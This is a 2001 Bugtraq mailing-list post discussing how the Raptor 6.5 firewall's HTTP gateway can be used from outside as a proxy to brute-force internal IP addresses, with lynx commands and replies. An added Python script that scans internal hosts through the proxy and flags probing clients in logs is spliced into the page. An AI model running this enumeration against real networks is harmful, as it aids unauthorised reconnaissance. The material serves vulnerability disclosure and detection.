Bugtraq mailing list archives
Re: Raptor 6.5 http vulnerability
From: Alexander Bochmann <ab () GXIS DE>
Date: Tue, 27 Mar 2001 00:26:32 +0200
Hi,

...on Mon, Mar 26, 2001 at 10:34:30PM +0200, Lysel Christian Emre wrote:

> > I already noticed some months ago that the Raptor (6.0.2) firewall's http gateway possibly leaks information about an internal network with the method you described, if redirected
>
> It does not leak information about the internal network. The apache webserver can leak information from error pages:
It does, because by trial-and-error, you can find out about IP addresses used on an internal interface with connections from an outside interface, with basically the same method as you described it, and by just monitoring the answers returned by the firewall. (On another note, at least with 6.5, if spoofing protection isn't activated and configured correctly on the internal interfaces, you can also flood the internal network with packets generated by the firewall as answer to (spoofed) packets on the outside interface - if you know the networks used internally.)
> > It's possible to brute-force IP addresses used on a DMZ network: If you use the http gateway on the external interface as proxy, you can access internal IPs (and internal DNS names) directly - just try them all ;)
>
> This should generate some logs!
As always, there has to be someone watching them.
> And can also be blocked by: http.urlpattern
>
> > Example:
> >
> > setenv http_proxy http://external.firewall.name:80/
> >
> > Now go on with something like...
> >
> > lynx -mime_header http://192.168.95.2:80/
> > HTTP/1.1 503 Service Unavailable
> > Server: Simple, Secure Web Server 1.1
> > [.. etc ..]
>
> This is the internal interface for the firewall, right?
Right, but as I said, this request can be sent from the outside interface. You can also use internal DNS names from an outside interface when addressing the http gateway as proxy, but I think these are usually more difficult to find out, unless you have an additional information source.
> > ...or, if you are lucky, an answer from a web server:
> >
> > % lynx -mime_header http://192.168.95.74:80/
>
> And this is a request to the webserver?
Yes, located on an internal network.
> http.remove-header, should remove the headers :)
I didn't know that one... But I don't think it would help, as an IP address with a working web server on it will usually return an answer that doesn't look like the error page of the http gateway on the Raptor, which will be indication enough you have found a valid internal IP, and can go on from there.

Alex.
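The probe-and-classify technique discussed in this thread, as an added example (it is not code from the original mail, from the poster, or from the Raptor product): a small Python script that sends proxy-form requests for candidate internal addresses through the gateway and treats anything other than the gateway's own canned 503 error page as evidence of a live internal host, plus a minimal check over proxy log lines for the "someone has to be watching the logs" point. The 503 status line and the "Simple, Secure Web Server 1.1" banner are the ones quoted above; the proxy address, the sample replies, the log line format and the sample log are constructed for this example and are assumptions, not observed data.

```python
"""Added example: enumerate internal hosts through an HTTP gateway used as a proxy,
and flag clients that probe many targets. Sample data below is constructed."""
import socket
from collections import defaultdict
from typing import Callable, Dict, Iterable, List, Optional, Tuple

# Banner of the gateway's error page as quoted in the thread.
GATEWAY_SERVER_BANNER = "Simple, Secure Web Server 1.1"


def parse_response_head(raw: bytes) -> Tuple[Optional[int], Dict[str, str]]:
    """Return (status_code, header dict with lowercase names) for a raw HTTP reply.
    Returns (None, {}) when the data does not start with an HTTP status line."""
    head = raw.split(b"\r\n\r\n", 1)[0].decode("latin-1", "replace")
    lines = head.replace("\r\n", "\n").split("\n")
    parts = lines[0].split(" ", 2)
    if len(parts) < 2 or not parts[0].startswith("HTTP/") or not parts[1].isdigit():
        return None, {}
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    return int(parts[1]), headers


def classify(raw: bytes) -> str:
    """'gateway-error' for the proxy's own 503 page, 'no-response' when nothing
    HTTP-like came back, otherwise 'live-host' (a real server answered through the
    proxy). A 503 with no Server header at all is still treated as the gateway's
    page, which is why stripping headers (http.remove-header) does not hide it."""
    status, headers = parse_response_head(raw)
    if status is None:
        return "no-response"
    server = headers.get("server")
    if status == 503 and server in (None, GATEWAY_SERVER_BANNER):
        return "gateway-error"
    return "live-host"


def fetch_via_proxy(proxy: Tuple[str, int], target: str, timeout: float = 5.0) -> bytes:
    """Send an absolute-URI request for http://target/ (the request form a proxy
    expects, which is what lynx sends with http_proxy set) and return the raw reply.
    Network errors yield b"" so the scan keeps going."""
    request = f"GET http://{target}/ HTTP/1.0\r\nHost: {target}\r\n\r\n".encode()
    try:
        with socket.create_connection(proxy, timeout=timeout) as s:
            s.sendall(request)
            chunks = []
            while True:
                data = s.recv(4096)
                if not data:
                    break
                chunks.append(data)
            return b"".join(chunks)
    except OSError:
        return b""


def scan(candidates: Iterable[str], fetch: Callable[[str], bytes]) -> Dict[str, str]:
    """Classify each candidate IP or name. `fetch` is injected so the same scan runs
    against a real proxy (fetch_via_proxy) or against constructed replies."""
    return {target: classify(fetch(target)) for target in candidates}


def flag_probing_clients(log_lines: Iterable[str], threshold: int = 3) -> List[str]:
    """Detection side. Log lines use the constructed form '<client> <target> <status>';
    returns clients that asked the proxy for more than `threshold` distinct targets,
    which is the footprint a brute-force sweep leaves behind."""
    targets = defaultdict(set)
    for line in log_lines:
        fields = line.split()
        if len(fields) >= 2:
            targets[fields[0]].add(fields[1])
    return sorted(c for c, t in targets.items() if len(t) > threshold)


# Constructed sample replies modelled on what the thread shows: the gateway's
# error page, a real web server, and a host that does not answer at all.
SAMPLE_REPLIES: Dict[str, bytes] = {
    "192.168.95.2": (b"HTTP/1.1 503 Service Unavailable\r\n"
                     b"Server: Simple, Secure Web Server 1.1\r\n"
                     b"Content-Type: text/html\r\n\r\n<html>error</html>"),
    "192.168.95.74": (b"HTTP/1.1 200 OK\r\nServer: Apache\r\n"
                      b"Content-Type: text/html\r\n\r\n<html>hello</html>"),
    "192.168.95.200": b"",
}

# Constructed proxy log: one outside client sweeping, one doing ordinary browsing.
SAMPLE_PROXY_LOG = [
    "203.0.113.9 192.168.95.1 503",
    "203.0.113.9 192.168.95.2 503",
    "203.0.113.9 192.168.95.3 503",
    "203.0.113.9 192.168.95.74 200",
    "198.51.100.4 www.example.com 200",
]

if __name__ == "__main__":
    # Offline run over the constructed replies; swap the lambda for
    # lambda t: fetch_via_proxy(("external.firewall.name", 80), t) against a real proxy.
    for target, verdict in scan(SAMPLE_REPLIES, lambda t: SAMPLE_REPLIES.get(t, b"")).items():
        print(f"{target:16} {verdict}")
    print("probing clients:", flag_probing_clients(SAMPLE_PROXY_LOG))
```

The classification keys on the gateway's 503 status line rather than only on the Server banner, so removing headers at the gateway does not change the verdict; the live-host signal is simply "not the gateway's page". Blocking the requests at the proxy (http.urlpattern) or alerting on a single client that walks many distinct internal targets is what actually closes the enumeration.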
Current thread:
- Raptor 6.5 http vulnerability Lysel Christian Emre (Mar 25)
- Re: Raptor 6.5 http vulnerability Alexander Bochmann (Mar 26)
- Re: Raptor 6.5 http vulnerability Erik Groennerud (Mar 27)
- <Possible follow-ups>
- Re: Raptor 6.5 http vulnerability Lysel Christian Emre (Mar 26)
- Re: Raptor 6.5 http vulnerability Alexander Bochmann (Mar 26)
- Re: Raptor 6.5 http vulnerability Alexander Bochmann (Mar 27)
- Re: Raptor 6.5 http vulnerability Alexander Bochmann (Mar 26)
- Re: Raptor 6.5 http vulnerability Alexander Bochmann (Mar 26)